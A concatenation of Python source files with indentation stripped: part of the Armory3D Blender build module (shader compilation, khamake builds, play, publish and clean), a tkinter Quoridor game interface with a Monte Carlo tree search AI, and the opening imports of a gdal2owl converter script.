print('Shader flags: ' + str(defs))
# Write compiled.glsl
shaders_path = build_dir + '/compiled/Shaders'
if not os.path.exists(shaders_path):
os.makedirs(shaders_path)
write_data.write_compiledglsl(defs + cdefs)
# Write referenced shader passes
if not os.path.isfile(build_dir + '/compiled/Shaders/shader_datas.arm') or state.last_world_defs != wrd.world_defs:
res = {}
res['shader_datas'] = []
for ref in assets.shader_passes:
# Ensure shader pass source exists
if not os.path.exists(raw_shaders_path + '/' + ref):
continue
assets.shader_passes_assets[ref] = []
if ref.startswith('compositor_pass'):
compile_shader_pass(res, raw_shaders_path, ref, defs + cdefs)
# elif ref.startswith('grease_pencil'):
# compile_shader_pass(res, raw_shaders_path, ref, [])
else:
compile_shader_pass(res, raw_shaders_path, ref, defs)
arm.utils.write_arm(shaders_path + '/shader_datas.arm', res)
for ref in assets.shader_passes:
for s in assets.shader_passes_assets[ref]:
assets.add_shader(shaders_path + '/' + s + '.glsl')
for file in assets.shaders_external:
name = file.split('/')[-1].split('\\')[-1]
target = build_dir + '/compiled/Shaders/' + name
if not os.path.exists(target):
shutil.copy(file, target)
state.last_world_defs = wrd.world_defs
# Reset path
os.chdir(fp)
# Copy std shaders
if not os.path.isdir(build_dir + '/compiled/Shaders/std'):
shutil.copytree(raw_shaders_path + 'std', build_dir + '/compiled/Shaders/std')
# Write khafile.js
enable_dce = is_publish and wrd.arm_dce
import_logic = not is_publish and arm.utils.logic_editor_space() != None
write_data.write_khafilejs(is_play, export_physics, export_navigation, export_ui, is_publish, enable_dce, in_viewport, ArmoryExporter.import_traits, import_logic)
# Write Main.hx - depends on write_khafilejs for writing number of assets
scene_name = arm.utils.get_project_scene_name()
resx, resy = arm.utils.get_render_resolution(arm.utils.get_active_scene())
# Import all logic nodes for patching if logic is being edited
if wrd.arm_write_config:
write_data.write_config(resx, resy)
write_data.write_main(scene_name, resx, resy, is_play, in_viewport, is_publish)
if scene_name != state.last_scene or resx != state.last_resx or resy != state.last_resy:
wrd.arm_recompile = True
state.last_resx = resx
state.last_resy = resy
state.last_scene = scene_name
def compile(target_name=None, watch=False, patch=False):
wrd = bpy.data.worlds['Arm']
fp = arm.utils.get_fp()
os.chdir(fp)
# Set build command
if target_name == None:
target_name = state.target
if target_name == 'native':
target_name = ''
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
kha_target_name = arm.utils.get_kha_target(target_name)
cmd = [node_path, khamake_path, kha_target_name]
ffmpeg_path = arm.utils.get_ffmpeg_path() # Path to binary
if ffmpeg_path != '':
cmd.append('--ffmpeg')
cmd.append(ffmpeg_path) # '"' + ffmpeg_path + '"'
state.export_gapi = arm.utils.get_gapi()
cmd.append('-g')
cmd.append(state.export_gapi)
if arm.utils.get_legacy_shaders() and not state.in_viewport:
cmd.append('--shaderversion')
cmd.append('110')
else:
cmd.append('--shaderversion')
cmd.append('330')
if '_VR' in wrd.world_defs:
cmd.append('--vr')
cmd.append('webvr')
cmd.append('--to')
if (kha_target_name == 'krom' and not state.in_viewport and not state.is_publish) or (kha_target_name == 'html5' and not state.is_publish):
cmd.append(arm.utils.build_dir() + '/debug')
else:
cmd.append(arm.utils.build_dir())
# User defined commands
if wrd.arm_khamake != '':
for s in bpy.data.texts[wrd.arm_khamake].as_string().split(' '):
cmd.append(s)
if patch:
if state.compileproc == None:
cmd.append('--nohaxe')
cmd.append('--noproject')
print("Running: ", cmd)
state.compileproc = subprocess.Popen(cmd, stderr=subprocess.PIPE)
if state.playproc == None:
mode = 'play_viewport' if state.in_viewport else 'play'
else:
mode = 'build'
threading.Timer(0.1, watch_patch, [mode]).start()
return state.compileproc
elif watch:
print("Running: ", cmd)
state.compileproc = subprocess.Popen(cmd)
mode = 'publish' if state.is_publish else 'build'
threading.Timer(0.1, watch_compile, [mode]).start()
return state.compileproc
else:
print("Running: ", cmd)
return subprocess.Popen(cmd)
def build_viewport():
if state.compileproc != None:
return
if not arm.utils.check_saved(None):
return
if not arm.utils.check_sdkpath(None):
return
if not arm.utils.check_engine(None):
return
arm.utils.check_default_rp()
state.is_export = False
assets.invalidate_enabled = False
play(in_viewport=True)
assets.invalidate_enabled = True
def build(is_play=False, is_publish=False, in_viewport=False):
global profile_time
profile_time = time.time()
state.is_publish = is_publish
state.in_viewport = in_viewport
# Save blend
if arm.utils.get_save_on_build() and not state.in_viewport:
bpy.ops.wm.save_mainfile()
log.clear()
# Set camera in active scene
active_scene = arm.utils.get_active_scene()
if active_scene.camera == None:
for o in active_scene.objects:
if o.type == 'CAMERA':
active_scene.camera = o
break
# Get paths
sdk_path = arm.utils.get_sdk_path()
raw_shaders_path = sdk_path + '/armory/Shaders/'
# Set dir
fp = arm.utils.get_fp()
os.chdir(fp)
# Create directories
wrd = bpy.data.worlds['Arm']
sources_path = 'Sources/' + arm.utils.safestr(wrd.arm_project_package)
if not os.path.exists(sources_path):
os.makedirs(sources_path)
# Save external scripts edited inside Blender
write_texts = False
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty:
write_texts = True
break
if write_texts:
area = bpy.context.area
old_type = area.type
area.type = 'TEXT_EDITOR'
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty and os.path.isfile(text.filepath):
area.spaces[0].text = text
bpy.ops.text.save()
area.type = old_type
# Save internal Haxe scripts
for text in bpy.data.texts:
if text.filepath == '' and text.name[-3:] == '.hx':
with open('Sources/' + arm.utils.safestr(wrd.arm_project_package) + '/' + text.name, 'w') as f:
f.write(text.as_string())
# Export data
export_data(fp, sdk_path, is_play=is_play, is_publish=is_publish, in_viewport=in_viewport)
if state.target == 'html5':
w, h = arm.utils.get_render_resolution(arm.utils.get_active_scene())
write_data.write_indexhtml(w, h, is_publish)
# Bundle files from include dir
if os.path.isdir('include'):
dest = '/html5/' if is_publish else '/debug/html5/'
for fn in glob.iglob(os.path.join('include', '**'), recursive=False):
shutil.copy(fn, arm.utils.build_dir() + dest + os.path.basename(fn))
def stop_project():
if state.playproc != None:
state.playproc.terminate()
state.playproc = None
def watch_play():
if state.playproc == None:
return
line = b''
while state.playproc != None and state.playproc.poll() == None:
char = state.playproc.stderr.read(1) # Read immediately one by one
if char == b'\n':
msg = str(line).split('"', 1) # Extract message
if len(msg) > 1:
trace = msg[1].rsplit('"', 1)[0]
log.krom_trace(trace)
line = b''
else:
line += char
state.playproc = None
log.clear()
def watch_compile(mode):
state.compileproc.wait()
print('Finished in ' + str(time.time() - profile_time))
if state.compileproc == None: ##
return
result = state.compileproc.poll()
state.compileproc = None
if result == 0:
bpy.data.worlds['Arm'].arm_recompile = False
on_compiled(mode)
else:
log.print_info('Build failed, check console')
def watch_patch(mode):
state.compileproc.wait()
state.compileproc = None
on_compiled(mode)
def runtime_to_target(in_viewport):
wrd = bpy.data.worlds['Arm']
if in_viewport or wrd.arm_play_runtime == 'Krom':
return 'krom'
elif wrd.arm_play_runtime == 'Native':
return 'native'
else:
return 'html5'
def get_khajs_path(in_viewport, target):
if in_viewport:
return arm.utils.build_dir() + '/krom/krom.js'
elif target == 'krom':
return arm.utils.build_dir() + '/debug/krom/krom.js'
else: # Browser
return arm.utils.build_dir() + '/debug/html5/kha.js'
def play(in_viewport):
global scripts_mtime
global code_parsed
wrd = bpy.data.worlds['Arm']
log.clear()
state.target = runtime_to_target(in_viewport)
# Build data
build(is_play=True, in_viewport=in_viewport)
khajs_path = get_khajs_path(in_viewport, state.target)
if not wrd.arm_cache_compiler or \
not os.path.isfile(khajs_path) or \
assets.khafile_defs_last != assets.khafile_defs or \
state.last_target != state.target or \
state.last_in_viewport != state.in_viewport or \
state.target == 'native':
wrd.arm_recompile = True
state.last_target = state.target
state.last_in_viewport = state.in_viewport
if state.in_viewport:
if arm.utils.get_rp().rp_gi != 'Off' and bpy.app.version < (2, 80, 1):
log.warn('Use Blender 2.8 to run Voxel GI in viewport')
# Trait sources modified
state.mod_scripts = []
script_path = arm.utils.get_fp() + '/Sources/' + arm.utils.safestr(wrd.arm_project_package)
if os.path.isdir(script_path):
new_mtime = scripts_mtime
for fn in glob.iglob(os.path.join(script_path, '**', '*.hx'), recursive=True):
mtime = os.path.getmtime(fn)
if scripts_mtime < mtime:
arm.utils.fetch_script_props(fn) # Trait props
fn = fn.split('Sources/')[1]
fn = fn[:-3] #.hx
fn = fn.replace('/', '.')
state.mod_scripts.append(fn)
wrd.arm_recompile = True
if new_mtime < mtime:
new_mtime = mtime
scripts_mtime = new_mtime
if len(state.mod_scripts) > 0: # Trait props
arm.utils.fetch_trait_props()
# New compile requred - traits changed
if wrd.arm_recompile:
mode = 'play'
if state.target == 'native':
state.compileproc = compile(target_name='--run')
elif state.target == 'krom':
if in_viewport:
mode = 'play_viewport'
state.compileproc = compile(target_name='krom')
else: # Browser
state.compileproc = compile(target_name='html5')
threading.Timer(0.1, watch_compile, [mode]).start()
else: # kha.js up to date
compile(patch=True)
def on_compiled(mode): # build, play, play_viewport, publish
log.clear()
wrd = bpy.data.worlds['Arm']
if mode == 'play_viewport':
open(arm.utils.get_fp_build() + '/krom/krom.lock', 'w').close()
elif mode == 'play':
if wrd.arm_play_runtime == 'Browser':
# Start server
os.chdir(arm.utils.get_fp())
t = threading.Thread(name='localserver', target=arm.lib.server.run)
t.daemon = True
t.start()
html5_app_path = 'http://localhost:8040/' + arm.utils.build_dir() + '/debug/html5'
webbrowser.open(html5_app_path)
elif wrd.arm_play_runtime == 'Krom':
bin_ext = '' if state.export_gapi == 'opengl' else '_' + state.export_gapi
krom_location, krom_path = arm.utils.krom_paths(bin_ext=bin_ext)
os.chdir(krom_location)
args = [krom_path, arm.utils.get_fp_build() + '/debug/krom', arm.utils.get_fp_build() + '/debug/krom-resources']
if arm.utils.get_os() == 'mac': # TODO: Krom sound freezes on MacOS
args.append('--nosound')
args.append('--stdout')
args.append(arm.utils.get_fp_build() + '/krom.txt')
state.playproc = subprocess.Popen(args, stderr=subprocess.PIPE)
watch_play()
elif mode == 'publish':
sdk_path = arm.utils.get_sdk_path()
target_name = arm.utils.get_kha_target(state.target)
files_path = arm.utils.get_fp_build() + '/' + target_name
if (target_name == 'html5' or target_name == 'krom') and wrd.arm_minify_js:
# Minify JS
minifier_path = sdk_path + '/lib/armory_tools/uglifyjs/bin/uglifyjs'
if target_name == 'html5':
jsfile = files_path + '/kha.js'
else:
jsfile = files_path + '/krom.js'
args = [arm.utils.get_node_path(), minifier_path, jsfile, '-o', jsfile]
proc = subprocess.Popen(args)
proc.wait()
if target_name == 'krom':
# Clean up
mapfile = files_path + '/krom.js.temp.map'
if os.path.exists(mapfile):
os.remove(mapfile)
# Copy Krom binaries
if state.target == 'krom-windows':
krom_location = sdk_path + '/Krom/win32/'
elif state.target == 'krom-linux':
krom_location = sdk_path + '/Krom/linux/'
else:
krom_location = sdk_path + '/Krom/macos/Krom.app'
if state.target == 'krom-macos':
shutil.copytree(krom_location, files_path + '/Krom.app')
game_files = os.listdir(files_path)
for f in game_files:
f = files_path + '/' + f
if os.path.isfile(f):
shutil.move(f, files_path + '/Krom.app/Contents/MacOS')
else:
krom_files = os.listdir(krom_location)
for f in krom_files:
f = krom_location + '/' + f
if os.path.isfile(f):
shutil.copy(f, files_path)
if state.target == 'krom-windows':
gapi = state.export_gapi
ext = '' if gapi == 'opengl' else '_' + gapi
bin_path = files_path + '/Krom' + ext + '.exe'
os.rename(bin_path, files_path + '/' + arm.utils.safestr(wrd.arm_project_name) + '.exe')
if gapi != 'opengl' and os.path.exists(files_path + '/Krom.exe'):
os.remove(files_path + '/Krom.exe')
if gapi != 'direct3d11' and os.path.exists(files_path + '/Krom_direct3d11.exe'):
os.remove(files_path + '/Krom_direct3d11.exe')
elif state.target == 'krom-linux':
os.rename(files_path + '/Krom', files_path + '/' + arm.utils.safestr(wrd.arm_project_name))
else:
os.rename(files_path + '/Krom.app', files_path + '/' + arm.utils.safestr(wrd.arm_project_name) + '.app')
# Rename
ext = state.target.split('-')[-1] # krom-windows
new_files_path = files_path + '-' + ext
os.rename(files_path, new_files_path)
files_path = new_files_path
if target_name == 'html5':
print('Exported HTML5 package to ' + files_path)
elif target_name == 'ios' or target_name == 'osx': # TODO: to macos
print('Exported XCode project to ' + files_path + '-build')
elif target_name == 'windows' or target_name == 'windowsapp':
print('Exported Visual Studio 2017 project to ' + files_path + '-build')
elif target_name == 'android-native':
print('Exported Android Studio project to ' + files_path + '-build/' + arm.utils.safestr(wrd.arm_project_name))
elif target_name == 'krom':
print('Exported Krom package to ' + files_path)
else:
print('Exported makefiles to ' + files_path + '-build')
def clean():
os.chdir(arm.utils.get_fp())
wrd = bpy.data.worlds['Arm']
# Remove build and compiled data
if os.path.isdir(arm.utils.build_dir()):
shutil.rmtree(arm.utils.build_dir(), onerror=remove_readonly)
if os.path.isdir(arm.utils.get_fp() + '/build'): # Kode Studio build dir
shutil.rmtree(arm.utils.get_fp() + '/build', onerror=remove_readonly)
# Remove compiled nodes
pkg_dir = arm.utils.safestr(wrd.arm_project_package).replace('.', '/')
nodes_path = 'Sources/' + pkg_dir + '/node/'
if os.path.isdir(nodes_path):
shutil.rmtree(nodes_path, onerror=remove_readonly)
# Remove khafile/korefile/Main.hx
if os.path.isfile('khafile.js'):
os.remove('khafile.js')
if os.path.isfile('korefile.js'):
os.remove('korefile.js')
if os.path.isfile('Sources/Main.hx'):
os.remove('Sources/Main.hx')
# Remove Sources/ dir if empty
if os.path.exists('Sources/' + pkg_dir) and os.listdir('Sources/' + pkg_dir) == []:
shutil.rmtree('Sources/' + pkg_dir, onerror=remove_readonly)
if os.path.exists('Sources') and os.listdir('Sources') == []:
shutil.rmtree('Sources/', onerror=remove_readonly)
# To recache signatures for batched materials
for mat in bpy.data.materials:
mat.signature = ''
mat.is_cached = False
print('Project cleaned')
|
driver.py
|
from tkinter import *
from math import floor
from quoridor import *
from features import simple_policy, simple_value
from threading import Thread
from sys import argv
from ai import monte_carlo_tree_search
from copy import deepcopy
class TkBoard(object):
# CONSTANTS
SQUARE_SIZE = 50
GOAL_SQUARE_SIZE = 8
PLAYER_SIZE = SQUARE_SIZE * 0.8
SQUARE_SPACING = 10
MARGIN = 20
PANEL_WIDTH = 200
ICON_MARGIN = 55
BUTTON_Y_START = 125
BUTTON_WIDTH = 100
BUTTON_HEIGHT = 30
BUTTON_MARGIN = 10
LABEL_Y_START = 330
LABEL_FONT_SIZE = 26
LABEL_SPACING = 10
def LABEL_TEXT(s, n, c):
return ("%-" + str(n + 7) + "s") % ("walls: " + "I" * c)
DEFAULT_COLORS = {'bg': '#FFFFFF',
'square': '#333333',
'wall': '#DD6611',
'wall-error': '#CC1111',
'panel': '#333333',
'button': '#555555',
'text': '#000000',
'players': ['#11CC11', '#CC11CC', '#CC1111', '#11CCCC']
}
# CLASS VARIABLES - DRAWING
tk_root = None
tk_canv = None
players = []
player_ghost = None
icon = None
ai_label = None
squares = [[0] * 9] * 9
goal_squares = []
wall_labels = []
flow_lines = []
grid = None
canvas_dims = (0, 0)
buttons = [] # will contain bbox and callback as tuple for each button
walls = {} # will be dictionary of name => id. all will exist, transparency toggled, colors changed for errors
active_wall = ""
active_move = ""
recent_x = 0
recent_y = 0
disp_flow = False
save_file = None
ai_depth = 6
ai_n_playout = 5000
# GAME-INTERACTION VARIABLES
moveType = "move"
game_over = False
# CONTROL VARIABLES
THREAD_SLEEP = 0.1
def set_default_colors(self, new_colors_dict={}):
"""update default colors with given dictionary of new color scheme
Given colors don't need to be complete - only updates those given"""
for k in new_colors_dict.keys():
if k in self.DEFAULT_COLORS.keys():
self.DEFAULT_COLORS[k] = new_colors_dict[k]
def new_game(self, ai=0, load_file=None, save_file=None, **kwargs):
"""Destroy old board, draw new board, update object state with new board
"""
if self.tk_root:
self.tk_root.destroy()
self.tk_root = Tk()
self.tk_root.bind("<Escape>", lambda e: self.handle_quit())
self.tk_root.bind("<Motion>", lambda e: self.handle_mouse_motion(e.x, e.y))
self.tk_root.bind("<Button-1>", lambda e: self.handle_click(e))
self.tk_root.bind("<Left>", lambda e: self.handle_keypress("L"))
self.tk_root.bind("<Right>", lambda e: self.handle_keypress("R"))
self.tk_root.bind("<Up>", lambda e: self.handle_keypress("U"))
self.tk_root.bind("<Down>", lambda e: self.handle_keypress("D"))
self.tk_root.bind("w", lambda e: self.set_movetype("wall"))
self.tk_root.bind("m", lambda e: self.set_movetype("move"))
self.tk_root.bind("<space>", lambda e: self.toggle_movetype())
self.tk_root.bind("u", lambda e: self.undo())
self.tk_root.bind("r", lambda e: self.redo())
self.tk_root.bind("<Enter>", lambda e: self.refresh())
self.tk_root.bind("t", lambda e: self.disp_time_stats())
self.tk_root.bind("f", lambda e: self.toggle_flow())
self.thread_kill = False
self.time_stats = []
# margin - space/2 - square - space - square - ... - square - space/2 - margin - panel
total_height = 9 * self.SQUARE_SIZE + 9 * self.SQUARE_SPACING + 2 * self.MARGIN
total_width = total_height + self.PANEL_WIDTH
self.canvas_dims = (total_width, total_height)
self.tk_canv = Canvas(self.tk_root, width=total_width, height=total_height,
background=self.DEFAULT_COLORS['bg'])
self.tk_canv.pack()
self.draw_squares()
self.generate_walls()
self.game = Quoridor()
self.save_file = save_file
if load_file is not None:
self.game = Quoridor.load(load_file, undo_all=True)
self.players = [(None, None)] * len(self.game.players)
self.max_walls = self.game.players[0][1]
self.wall_labels = [None] * len(self.game.players)
self.draw_panel()
self.ai_threads = [None] * ai
self.ai_players = range(ai)
self.ai_running = False
self.ai_depth = kwargs.get('ai_depth', self.ai_depth)
self.ai_n_playout = kwargs.get('ai_n_playout', self.ai_n_playout)
self.draw_squares()
self.draw_goals()
self.generate_walls()
self.refresh()
if ai > 0:
self.start_ai(0)
self.tk_root.focus_force()
self.tk_root.mainloop()
def handle_quit(self):
if self.save_file is not None:
self.game.save(self.save_file)
self.tk_root.destroy()
def refresh(self):
self.clear_ghost()
self.handle_mouse_motion(self.recent_x, self.recent_y)
self.active_wall = ""
self.active_move = ""
self.draw_players()
self.draw_current_player_icon()
self.draw_wall_counts()
self.draw_flow()
self.redraw_walls(False)
def draw_current_player_icon(self):
width, height = self.canvas_dims
midx = width - self.PANEL_WIDTH / 2
radius = self.PLAYER_SIZE / 2
x0, x1 = midx - radius, midx + radius
y0, y1 = self.ICON_MARGIN - radius, self.ICON_MARGIN + radius
c = self.DEFAULT_COLORS['players'][self.game.current_player]
oval = self.tk_canv.create_oval(x0, y0, x1, y1, fill=c, outline="")
if self.icon:
self.tk_canv.delete(self.icon)
self.icon = oval
def draw_flow(self):
for line in self.flow_lines:
self.tk_canv.delete(line)
if self.disp_flow:
graph = self.game._pathgraphs[self.game.current_player]
for (cur, next) in graph._downhill.items():
if next is not None:
(x0, y0) = self.grid_to_point(cur)
(x1, y1) = self.grid_to_point(next)
self.flow_lines.append(self.tk_canv.create_line(x0, y0, x1, y1, fill='green'))
def new_rect_button(self, text, fill, x0, y0, x1, y1, callback):
hover_lighten = TkBoard.alpha_hax(fill, "#FFFFFF", 0.25)
self.tk_canv.create_rectangle(x0, y0, x1, y1, fill=fill, activefill=hover_lighten,
outline="")
midx = (x0 + x1) / 2
midy = (y0 + y1) / 2
self.tk_canv.create_text((midx, midy), text=text, font=("Arial", 14, "bold"))
self.buttons.append(((x0, y0, x1, y1), callback))
def set_movetype(self, type):
self.moveType = type
self.refresh()
def toggle_movetype(self):
if self.moveType == "wall":
self.set_movetype("move")
elif self.moveType == "move":
self.set_movetype("wall")
self.refresh()
def toggle_flow(self):
self.disp_flow = not self.disp_flow
self.refresh()
def draw_panel(self):
# panel bg
width, height = self.canvas_dims
midx = width-self.PANEL_WIDTH/2
c = self.DEFAULT_COLORS['panel']
self.tk_canv.create_rectangle(width-self.PANEL_WIDTH, 0, width, height, fill=c)
# current-player icon @ top
self.draw_current_player_icon()
# buttons!
c = self.DEFAULT_COLORS['button']
x0, x1 = midx-self.BUTTON_WIDTH/2, midx + self.BUTTON_WIDTH/2
y0, y1 = self.BUTTON_Y_START, self.BUTTON_Y_START + self.BUTTON_HEIGHT
self.new_rect_button("Move", c, x0, y0, x1, y1, lambda: self.set_movetype("move"))
yshift = self.BUTTON_HEIGHT + self.BUTTON_MARGIN
y0 += yshift
y1 += yshift
self.new_rect_button("Wall", c, x0, y0, x1, y1, lambda: self.set_movetype("wall"))
y0 += yshift
y1 += yshift
self.new_rect_button("undo", c, x0, y0, x1, y1, lambda: self.undo())
y0 += yshift
y1 += yshift
self.new_rect_button("redo", c, x0, y0, x1, y1, lambda: self.redo())
# "walls: IIII" text
self.draw_wall_counts()
def undo(self):
self.game.undo()
self.refresh()
self.game_over = False
def redo(self):
self.game.redo()
self.refresh()
def draw_wall_counts(self):
width, height = self.canvas_dims
midx = width - self.PANEL_WIDTH / 2
y = self.LABEL_Y_START
for i in range(len(self.game.players)):
p = self.game.players[i]
text = self.LABEL_TEXT(self.max_walls, p[1])
c = self.DEFAULT_COLORS['players'][i]
l = self.wall_labels[i]
if not l:
l = self.tk_canv.create_text((midx, y), text=text,
font=("Arial", self.LABEL_FONT_SIZE, "bold"), fill=c)
self.wall_labels[i] = l
else:
self.tk_canv.itemconfigure(l, text=text)
y += self.LABEL_SPACING + self.LABEL_FONT_SIZE
def handle_mouse_motion(self, x, y):
if self.game_over or self.ai_running:
return
self.recent_x = x
self.recent_y = y
grid = self.point_to_grid((x, y))
if grid and self.moveType == "move":
move_str = encode_loc(*grid)
if move_str != self.active_move:
self.active_move = move_str
if self.game.is_legal(move_str):
self.draw_player(grid, self.game.current_player, True)
elif self.player_ghost:
self.tk_canv.delete(self.player_ghost)
self.player_ghost = None
elif grid and self.moveType == "wall":
orient, topleft = self.xy_to_wall_spec(grid, x, y)
pos = encode_loc(*topleft)
wall_str = pos + orient
if wall_str != self.active_wall:
self.active_wall = wall_str
active_error = not self.game.is_legal(wall_str)
self.redraw_walls(active_error)
def handle_click(self, e):
x = e.x
y = e.y
# check for button press
for b in self.buttons:
(x0, y0, x1, y1), callback = b
if (x0 <= x <= x1) and (y0 <= y <= y1):
callback()
return
if self.game_over:
return
# check for turn execution
grid = self.point_to_grid((x, y))
success = False
if grid and self.moveType == "move":
move_str = encode_loc(*grid)
success = self.exec_wrapper(move_str)
elif grid and self.moveType == "wall":
orient, topleft = self.xy_to_wall_spec(grid, x, y)
pos = encode_loc(*topleft)
wall_str = pos + orient
success = self.exec_wrapper(wall_str)
if success:
self.refresh()
def handle_keypress(self, key):
(cr, cc) = self.game.players[self.game.current_player][0]
if key == "L":
cc -= 1
elif key == "R":
cc += 1
elif key == "U":
cr -= 1
elif key == "D":
cr += 1
move_str = encode_loc(*(cr, cc))
success = self.exec_wrapper(move_str)
if success:
self.refresh()
def wall_on(self, wall_str, error=False):
color = self.DEFAULT_COLORS['wall'] if not error else self.DEFAULT_COLORS['wall-error']
if wall_str in self.walls:
box_id = self.walls[wall_str]
if not error:
self.tk_canv.itemconfigure(box_id, fill=color)
else:
# instead of above: changing color, delete and redraw it
# so it's the topmost element
self.tk_canv.delete(box_id)
(x0, y0, x1, y1) = self.wall_str_to_coords(wall_str)
self.walls[wall_str] = self.tk_canv.create_rectangle(x0, y0, x1, y1, fill=color,
outline="")
def wall_off(self, wall_str):
if wall_str in self.walls:
box_id = self.walls[wall_str]
self.tk_canv.itemconfigure(box_id, fill="")
def redraw_walls(self, active_error=True):
for w in self.walls.keys():
self.wall_off(w)
for w in self.game.walls:
self.wall_on(w)
if self.active_wall:
self.wall_on(self.active_wall, active_error)
def exec_wrapper(self, turn_str, is_ai=False):
try:
if self.ai_running:
return False
self.game.exec_move(turn_str)
winner = self.game.get_winner()
if winner is not None:
self.game_over = True
print("GAME OVER")
self.refresh()
if self.game.current_player in self.ai_players:
self.start_ai(self.game.current_player)
return True
except IllegalMove:
print("ILLEGAL MOVE: %s" % turn_str)
return False
print("FAILED")
return False
def start_ai(self, player_idx):
def get_and_exec_move(game):
mv = monte_carlo_tree_search(game, simple_value, simple_policy,
self.ai_depth, self.ai_n_playout)
self.ai_running = False
self.exec_wrapper(mv, is_ai=True)
print("AI FINISHED")
self.ai_threads[player_idx] = Thread(target=get_and_exec_move, args=(deepcopy(self.game),))
self.ai_threads[player_idx].daemon = True
self.ai_running = True
self.ai_threads[player_idx].start()
print("AI STARTED")
def draw_squares(self):
for r in range(9):
for c in range(9):
x = self.MARGIN + self.SQUARE_SPACING / 2 + (self.SQUARE_SIZE + self.SQUARE_SPACING) * c # noqa: E501
y = self.MARGIN + self.SQUARE_SPACING / 2 + (self.SQUARE_SIZE + self.SQUARE_SPACING) * r # noqa: E501
color = self.DEFAULT_COLORS['square']
sq = self.tk_canv.create_rectangle(x, y, x + self.SQUARE_SIZE,
y + self.SQUARE_SIZE, fill=color, outline="")
self.squares[r][c] = sq
def draw_goals(self):
for i, p in enumerate(self.game.players):
color = self.DEFAULT_COLORS['players'][i]
for g in GOALS[i]:
(cx, cy) = self.grid_to_point(g)
top = cy - self.GOAL_SQUARE_SIZE / 2
left = cx - self.GOAL_SQUARE_SIZE / 2
new_square = self.tk_canv.create_rectangle(left, top, left + self.GOAL_SQUARE_SIZE,
top + self.GOAL_SQUARE_SIZE, fill=color,
outline="")
self.goal_squares.append(new_square)
def generate_walls(self):
for w in ALL_WALLS:
(x0, y0, x1, y1) = self.wall_str_to_coords(w)
# regular wall
r = self.tk_canv.create_rectangle(x0, y0, x1, y1, fill="", outline="")
self.walls[w] = r
def xy_to_wall_spec(self, grid, x, y):
cx, cy = self.grid_to_point(grid)
dx = x - cx
dy = y - cy
# wall orientation - I'll explain this when you're older
r2 = 2**0.5
rotx = r2 * dx - r2 * dy
roty = r2 * dx + r2 * dy
if rotx * roty >= 0:
orient = 'v'
else:
orient = 'h'
# wall position (top-left)
gr, gc = grid
if dx < 0:
gc -= 1
if dy < 0:
gr -= 1
return (orient, (gr, gc))
def wall_str_to_coords(self, wall_str):
grid_pos = parse_loc(wall_str[0:2])
orient = wall_str[2]
cx, cy = self.grid_to_point(grid_pos)
wall_len = 2 * self.SQUARE_SIZE + self.SQUARE_SPACING
wall_wid = self.SQUARE_SPACING
halfwidth = self.SQUARE_SIZE / 2
if orient == 'v':
x0 = cx + halfwidth
y0 = cy - halfwidth
x1 = x0 + wall_wid
y1 = y0 + wall_len
elif orient == 'h':
x0 = cx - halfwidth
y0 = cy + halfwidth
x1 = x0 + wall_len
y1 = y0 + wall_wid
return (x0, y0, x1, y1)
def draw_players(self):
for i, p in enumerate(self.game.players):
self.draw_player(p[0], i)
def draw_player(self, center, num, ghost=False):
xy = self.grid_to_point(center)
if not xy:
return
x, y = xy
# remove old ovals from the board
oval, text = self.players[num]
if not ghost and oval:
self.tk_canv.delete(oval)
if text:
self.tk_canv.delete(text)
elif ghost and self.player_ghost:
self.tk_canv.delete(self.player_ghost)
# draw new
c = self.DEFAULT_COLORS['players'][num]
if ghost:
bg = self.DEFAULT_COLORS['square']
c = TkBoard.alpha_hax(bg, c, 0.4)
radius = self.PLAYER_SIZE / 2
oval = self.tk_canv.create_oval(x - radius, y - radius, x + radius, y + radius, fill=c,
outline="")
text = None
if not ghost:
self.players[num] = (oval, text)
else:
self.player_ghost = oval
def clear_ghost(self):
if self.player_ghost:
self.tk_canv.delete(self.player_ghost)
self.player_ghost = None
def grid_to_point(self, grid_pt):
"""given (row, col), return centerpoint of that square on the canvas
If not a valid grid point, return None"""
r, c = grid_pt
if (0 <= r <= 8) and (0 <= c <= 8):
x = self.MARGIN + self.SQUARE_SPACING / 2 + (self.SQUARE_SIZE + self.SQUARE_SPACING) * c # noqa: E501
y = self.MARGIN + self.SQUARE_SPACING / 2 + (self.SQUARE_SIZE + self.SQUARE_SPACING) * r # noqa: E501
halfsquare = self.SQUARE_SIZE / 2
return (x + halfsquare, y + halfsquare)
else:
return None
def point_to_grid(self, xy):
"""given (x, y), return (row, col) of corresponding grid space.
If off the grid or one row of spacing on outside, returns None"""
x, y = xy
x -= self.MARGIN
y -= self.MARGIN
full_space = self.SQUARE_SIZE + self.SQUARE_SPACING
r = int(floor(y / full_space))
c = int(floor(x / full_space))
if (0 <= r <= 8) and (0 <= c <= 8):
return (r, c)
else:
return None
@staticmethod
def alpha_hax(back, front, alpha):
"""since tkinter doesnt support alpha channels as far as I can tell,
this function does 2-color blending on hex strings, returning blended hex string"""
# get numeric values
b_r = int(back[1:3], 16)
b_g = int(back[3:5], 16)
b_b = int(back[5:7], 16)
f_r = int(front[1:3], 16)
f_g = int(front[3:5], 16)
f_b = int(front[5:7], 16)
# combine 'em
new_r = int(b_r * (1 - alpha) + f_r * alpha)
new_g = int(b_g * (1 - alpha) + f_g * alpha)
new_b = int(b_b * (1 - alpha) + f_b * alpha)
# get hex versions, take off leading '0x' and pad with "0" when len() < 2
hex_r = hex(new_r)[2:].rjust(2, "0")
hex_g = hex(new_g)[2:].rjust(2, "0")
hex_b = hex(new_b)[2:].rjust(2, "0")
return "#" + hex_r + hex_g + hex_b
def disp_time_stats(self):
print(self.time_stats)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description='Graphical interface for local Quoridor game.')
parser.add_argument("--ai", help="number of AI players (Default: 0)", type=int, default=0)
parser.add_argument("--ai-depth", help="AI players' search depth (Default: 6)", type=int, default=6) # noqa: E501
parser.add_argument("--ai-n-playout", help="AI players' number of playouts (Default: 5000)", type=int, default=5000) # noqa: E501
parser.add_argument("--save-file", help=".qdr file path of where to save results on quit.")
parser.add_argument("--load-file", help=".qdr file path of game to load.")
args = parser.parse_args()
tkb = TkBoard()
tkb.new_game(**vars(args))
|
gdal2owl.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: houzhiwei
# time: 2019/9/14
from owlready2 import *
import json
from JSON2OWL.OwlConvert.OwlUtils import OWLUtils
from JSON2OWL.OwlConvert.Preprocessor import Preprocessor
